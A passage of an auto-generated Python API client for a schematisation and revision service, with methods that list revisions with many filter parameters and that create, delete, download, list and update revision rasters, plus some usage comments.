query_params.append(('schematisation__owner__name__endswith', local_var_params['schematisation__owner__name__endswith'])) # noqa: E501
if 'schematisation__owner__name__regex' in local_var_params and local_var_params['schematisation__owner__name__regex'] is not None: # noqa: E501
query_params.append(('schematisation__owner__name__regex', local_var_params['schematisation__owner__name__regex'])) # noqa: E501
if 'schematisation__owner__unique_id' in local_var_params and local_var_params['schematisation__owner__unique_id'] is not None: # noqa: E501
query_params.append(('schematisation__owner__unique_id', local_var_params['schematisation__owner__unique_id'])) # noqa: E501
if 'schematisation__owner__unique_id__iexact' in local_var_params and local_var_params['schematisation__owner__unique_id__iexact'] is not None: # noqa: E501
query_params.append(('schematisation__owner__unique_id__iexact', local_var_params['schematisation__owner__unique_id__iexact'])) # noqa: E501
if 'schematisation__owner__unique_id__contains' in local_var_params and local_var_params['schematisation__owner__unique_id__contains'] is not None: # noqa: E501
query_params.append(('schematisation__owner__unique_id__contains', local_var_params['schematisation__owner__unique_id__contains'])) # noqa: E501
if 'schematisation__owner__unique_id__icontains' in local_var_params and local_var_params['schematisation__owner__unique_id__icontains'] is not None: # noqa: E501
query_params.append(('schematisation__owner__unique_id__icontains', local_var_params['schematisation__owner__unique_id__icontains'])) # noqa: E501
if 'schematisation__owner__unique_id__in' in local_var_params and local_var_params['schematisation__owner__unique_id__in'] is not None: # noqa: E501
query_params.append(('schematisation__owner__unique_id__in', local_var_params['schematisation__owner__unique_id__in'])) # noqa: E501
if 'schematisation__owner__unique_id__startswith' in local_var_params and local_var_params['schematisation__owner__unique_id__startswith'] is not None: # noqa: E501
query_params.append(('schematisation__owner__unique_id__startswith', local_var_params['schematisation__owner__unique_id__startswith'])) # noqa: E501
if 'schematisation__owner__unique_id__istartswith' in local_var_params and local_var_params['schematisation__owner__unique_id__istartswith'] is not None: # noqa: E501
query_params.append(('schematisation__owner__unique_id__istartswith', local_var_params['schematisation__owner__unique_id__istartswith'])) # noqa: E501
if 'schematisation__owner__unique_id__endswith' in local_var_params and local_var_params['schematisation__owner__unique_id__endswith'] is not None: # noqa: E501
query_params.append(('schematisation__owner__unique_id__endswith', local_var_params['schematisation__owner__unique_id__endswith'])) # noqa: E501
if 'schematisation__owner__unique_id__regex' in local_var_params and local_var_params['schematisation__owner__unique_id__regex'] is not None: # noqa: E501
query_params.append(('schematisation__owner__unique_id__regex', local_var_params['schematisation__owner__unique_id__regex'])) # noqa: E501
if 'commit_user__username' in local_var_params and local_var_params['commit_user__username'] is not None: # noqa: E501
query_params.append(('commit_user__username', local_var_params['commit_user__username'])) # noqa: E501
if 'commit_user__username__iexact' in local_var_params and local_var_params['commit_user__username__iexact'] is not None: # noqa: E501
query_params.append(('commit_user__username__iexact', local_var_params['commit_user__username__iexact'])) # noqa: E501
if 'commit_user__username__contains' in local_var_params and local_var_params['commit_user__username__contains'] is not None: # noqa: E501
query_params.append(('commit_user__username__contains', local_var_params['commit_user__username__contains'])) # noqa: E501
if 'commit_user__username__icontains' in local_var_params and local_var_params['commit_user__username__icontains'] is not None: # noqa: E501
query_params.append(('commit_user__username__icontains', local_var_params['commit_user__username__icontains'])) # noqa: E501
if 'commit_user__username__in' in local_var_params and local_var_params['commit_user__username__in'] is not None: # noqa: E501
query_params.append(('commit_user__username__in', local_var_params['commit_user__username__in'])) # noqa: E501
if 'commit_user__username__startswith' in local_var_params and local_var_params['commit_user__username__startswith'] is not None: # noqa: E501
query_params.append(('commit_user__username__startswith', local_var_params['commit_user__username__startswith'])) # noqa: E501
if 'commit_user__username__istartswith' in local_var_params and local_var_params['commit_user__username__istartswith'] is not None: # noqa: E501
query_params.append(('commit_user__username__istartswith', local_var_params['commit_user__username__istartswith'])) # noqa: E501
if 'commit_user__username__endswith' in local_var_params and local_var_params['commit_user__username__endswith'] is not None: # noqa: E501
query_params.append(('commit_user__username__endswith', local_var_params['commit_user__username__endswith'])) # noqa: E501
if 'commit_user__username__regex' in local_var_params and local_var_params['commit_user__username__regex'] is not None: # noqa: E501
query_params.append(('commit_user__username__regex', local_var_params['commit_user__username__regex'])) # noqa: E501
if 'commit_date' in local_var_params and local_var_params['commit_date'] is not None: # noqa: E501
query_params.append(('commit_date', local_var_params['commit_date'])) # noqa: E501
if 'commit_date__gt' in local_var_params and local_var_params['commit_date__gt'] is not None: # noqa: E501
query_params.append(('commit_date__gt', local_var_params['commit_date__gt'])) # noqa: E501
if 'commit_date__gte' in local_var_params and local_var_params['commit_date__gte'] is not None: # noqa: E501
query_params.append(('commit_date__gte', local_var_params['commit_date__gte'])) # noqa: E501
if 'commit_date__lt' in local_var_params and local_var_params['commit_date__lt'] is not None: # noqa: E501
query_params.append(('commit_date__lt', local_var_params['commit_date__lt'])) # noqa: E501
if 'commit_date__lte' in local_var_params and local_var_params['commit_date__lte'] is not None: # noqa: E501
query_params.append(('commit_date__lte', local_var_params['commit_date__lte'])) # noqa: E501
if 'commit_date__date' in local_var_params and local_var_params['commit_date__date'] is not None: # noqa: E501
query_params.append(('commit_date__date', local_var_params['commit_date__date'])) # noqa: E501
if 'commit_date__date__gt' in local_var_params and local_var_params['commit_date__date__gt'] is not None: # noqa: E501
query_params.append(('commit_date__date__gt', local_var_params['commit_date__date__gt'])) # noqa: E501
if 'commit_date__date__gte' in local_var_params and local_var_params['commit_date__date__gte'] is not None: # noqa: E501
query_params.append(('commit_date__date__gte', local_var_params['commit_date__date__gte'])) # noqa: E501
if 'commit_date__date__lt' in local_var_params and local_var_params['commit_date__date__lt'] is not None: # noqa: E501
query_params.append(('commit_date__date__lt', local_var_params['commit_date__date__lt'])) # noqa: E501
if 'commit_date__date__lte' in local_var_params and local_var_params['commit_date__date__lte'] is not None: # noqa: E501
query_params.append(('commit_date__date__lte', local_var_params['commit_date__date__lte'])) # noqa: E501
if 'commit_date__year' in local_var_params and local_var_params['commit_date__year'] is not None: # noqa: E501
query_params.append(('commit_date__year', local_var_params['commit_date__year'])) # noqa: E501
if 'commit_date__year__gt' in local_var_params and local_var_params['commit_date__year__gt'] is not None: # noqa: E501
query_params.append(('commit_date__year__gt', local_var_params['commit_date__year__gt'])) # noqa: E501
if 'commit_date__year__gte' in local_var_params and local_var_params['commit_date__year__gte'] is not None: # noqa: E501
query_params.append(('commit_date__year__gte', local_var_params['commit_date__year__gte'])) # noqa: E501
if 'commit_date__year__lt' in local_var_params and local_var_params['commit_date__year__lt'] is not None: # noqa: E501
query_params.append(('commit_date__year__lt', local_var_params['commit_date__year__lt'])) # noqa: E501
if 'commit_date__year__lte' in local_var_params and local_var_params['commit_date__year__lte'] is not None: # noqa: E501
query_params.append(('commit_date__year__lte', local_var_params['commit_date__year__lte'])) # noqa: E501
if 'commit_date__month' in local_var_params and local_var_params['commit_date__month'] is not None: # noqa: E501
query_params.append(('commit_date__month', local_var_params['commit_date__month'])) # noqa: E501
if 'commit_date__month__lte' in local_var_params and local_var_params['commit_date__month__lte'] is not None: # noqa: E501
query_params.append(('commit_date__month__lte', local_var_params['commit_date__month__lte'])) # noqa: E501
if 'commit_date__day' in local_var_params and local_var_params['commit_date__day'] is not None: # noqa: E501
query_params.append(('commit_date__day', local_var_params['commit_date__day'])) # noqa: E501
if 'commit_date__day__lt' in local_var_params and local_var_params['commit_date__day__lt'] is not None: # noqa: E501
query_params.append(('commit_date__day__lt', local_var_params['commit_date__day__lt'])) # noqa: E501
if 'commit_date__week' in local_var_params and local_var_params['commit_date__week'] is not None: # noqa: E501
query_params.append(('commit_date__week', local_var_params['commit_date__week'])) # noqa: E501
if 'commit_date__week_day' in local_var_params and local_var_params['commit_date__week_day'] is not None: # noqa: E501
query_params.append(('commit_date__week_day', local_var_params['commit_date__week_day'])) # noqa: E501
if 'committed' in local_var_params and local_var_params['committed'] is not None: # noqa: E501
query_params.append(('committed', local_var_params['committed'])) # noqa: E501
if 'archived' in local_var_params and local_var_params['archived'] is not None: # noqa: E501
query_params.append(('archived', local_var_params['archived'])) # noqa: E501
if 'is_valid' in local_var_params and local_var_params['is_valid'] is not None: # noqa: E501
query_params.append(('is_valid', local_var_params['is_valid'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2001', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
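    # Illustrative usage sketch (not part of the generated client): the
    # Django-style lookup parameters above translate one-to-one into query
    # string filters, and limit/offset drive pagination. That the paginated
    # response exposes a `results` attribute is an assumption about the
    # InlineResponse2001 model.
    #
    #     page = api.schematisations_revisions_list(
    #         "123",
    #         committed="true",
    #         commit_message__icontains="fix",
    #         limit=20,
    #         offset=0,
    #     )
    #     for revision in page.results:
    #         print(revision.number, revision.commit_message)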
def schematisations_revisions_rasters_create(self, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""Endpoint for creating a raster linked to a revision. # noqa: E501
        Each raster type can be created/uploaded only once. An optional md5sum can be supplied to detect whether the file has already been uploaded, enabling automatic de-duplication. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_create(revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param RasterCreate data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
        :param _request_timeout: timeout setting for this request. If a
                                 single number is provided, it will be the
                                 total request timeout. It can also be a
                                 pair (tuple) of (connection, read) timeouts.
:return: RevisionRaster
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_rasters_create_with_http_info(revision_pk, schematisation_pk, data, **kwargs) # noqa: E501
def schematisations_revisions_rasters_create_with_http_info(self, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""Endpoint for creating a raster linked to a revision. # noqa: E501
        Each raster type can be created/uploaded only once. An optional md5sum can be supplied to detect whether the file has already been uploaded, enabling automatic de-duplication. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_create_with_http_info(revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param RasterCreate data: (required)
        :param _return_http_data_only: response data without HTTP status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If a
                                 single number is provided, it will be the
                                 total request timeout. It can also be a
                                 pair (tuple) of (connection, read) timeouts.
:return: tuple(RevisionRaster, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'revision_pk',
'schematisation_pk',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_rasters_create" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_rasters_create`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_rasters_create`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_revisions_rasters_create`") # noqa: E501
collection_formats = {}
path_params = {}
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/rasters/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RevisionRaster', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
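    # Illustrative usage sketch (not part of the generated client). The
    # `RasterCreate` field names used here (`name`, `type`, `md5sum`) are
    # assumptions; check the generated model. Supplying md5sum lets the
    # server skip the upload when it already has an identical file.
    #
    #     raster = api.schematisations_revisions_rasters_create(
    #         revision_pk=str(revision.id),
    #         schematisation_pk="123",
    #         data=RasterCreate(name="dem", type="dem_file", md5sum=checksum),
    #     )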
def schematisations_revisions_rasters_delete(self, id, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_delete # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_delete(id, revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision raster. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
        :param _request_timeout: timeout setting for this request. If a
                                 single number is provided, it will be the
                                 total request timeout. It can also be a
                                 pair (tuple) of (connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_rasters_delete_with_http_info(id, revision_pk, schematisation_pk, **kwargs) # noqa: E501
def schematisations_revisions_rasters_delete_with_http_info(self, id, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_delete # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_delete_with_http_info(id, revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision raster. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
        :param _return_http_data_only: response data without HTTP status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If a
                                 single number is provided, it will be the
                                 total request timeout. It can also be a
                                 pair (tuple) of (connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'revision_pk',
'schematisation_pk'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_rasters_delete" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_rasters_delete`") # noqa: E501
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_rasters_delete`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_rasters_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/rasters/{id}/', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
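    # Illustrative usage sketch (not part of the generated client): removing a
    # raster from a revision. All three path parameters are required; the call
    # returns None on success.
    #
    #     api.schematisations_revisions_rasters_delete(
    #         id=raster.id,
    #         revision_pk=str(revision.id),
    #         schematisation_pk="123",
    #     )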
def schematisations_revisions_rasters_download(self, id, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_download # noqa: E501
Endpoint for downloading files. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_download(id, revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision raster. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
        :param _request_timeout: timeout setting for this request. If a
                                 single number is provided, it will be the
                                 total request timeout. It can also be a
                                 pair (tuple) of (connection, read) timeouts.
:return: Download
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_rasters_download_with_http_info(id, revision_pk, schematisation_pk, **kwargs) # noqa: E501
def schematisations_revisions_rasters_download_with_http_info(self, id, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_download # noqa: E501
Endpoint for downloading files. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_download_with_http_info(id, revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision raster. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
        :param _return_http_data_only: response data without HTTP status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If a
                                 single number is provided, it will be the
                                 total request timeout. It can also be a
                                 pair (tuple) of (connection, read) timeouts.
:return: tuple(Download, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'revision_pk',
'schematisation_pk'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_rasters_download" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_rasters_download`") # noqa: E501
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_rasters_download`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_rasters_download`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/rasters/{id}/download/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Download', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
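# Usage sketch (kept in comments so nothing executes at import time): a
# typical download flow for a revision raster. The `Download` model's fields
# are not defined in this file, so `get_url` below is an assumption for
# illustration only.
#
#     download = api.schematisations_revisions_rasters_download(
#         raster_id, revision_id, schematisation_id)
#     # The returned `Download` is expected to reference the file location,
#     # e.g. an assumed `download.get_url`, which can then be fetched with
#     # any HTTP client.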
def schematisations_revisions_rasters_list(self, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_list # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_list(revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding the response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_rasters_list_with_http_info(revision_pk, schematisation_pk, **kwargs) # noqa: E501
def schematisations_revisions_rasters_list_with_http_info(self, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_list # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_list_with_http_info(revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param _return_http_data_only: if True, return only the response data,
without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding the response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2002, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'revision_pk',
'schematisation_pk',
'limit',
'offset'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_rasters_list" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_rasters_list`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_rasters_list`") # noqa: E501
collection_formats = {}
path_params = {}
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/rasters/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2002', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
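# Usage sketch: paging through rasters with the documented `limit`/`offset`
# query parameters. The attribute names on `InlineResponse2002` (`count`,
# `results`) follow the usual DRF-style pagination envelope and are an
# assumption here.
#
#     offset, limit = 0, 50
#     while True:
#         page = api.schematisations_revisions_rasters_list(
#             revision_id, schematisation_id, limit=limit, offset=offset)
#         for raster in page.results:  # assumed field
#             process(raster)
#         offset += limit
#         if offset >= page.count:  # assumed field
#             break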
def schematisations_revisions_rasters_partial_update(self, id, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_partial_update # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_partial_update(id, revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision raster. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param RevisionRaster data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding the response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: RevisionRaster
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_rasters_partial_update_with_http_info(id, revision_pk, schematisation_pk, data, **kwargs) # noqa: E501
def schematisations_revisions_rasters_partial_update_with_http_info(self, id, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_partial_update # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_partial_update_with_http_info(id, revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision raster. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param RevisionRaster data: (required)
:param _return_http_data_only: if True, return only the response data,
without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding the response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(RevisionRaster, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'revision_pk',
'schematisation_pk',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_rasters_partial_update" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
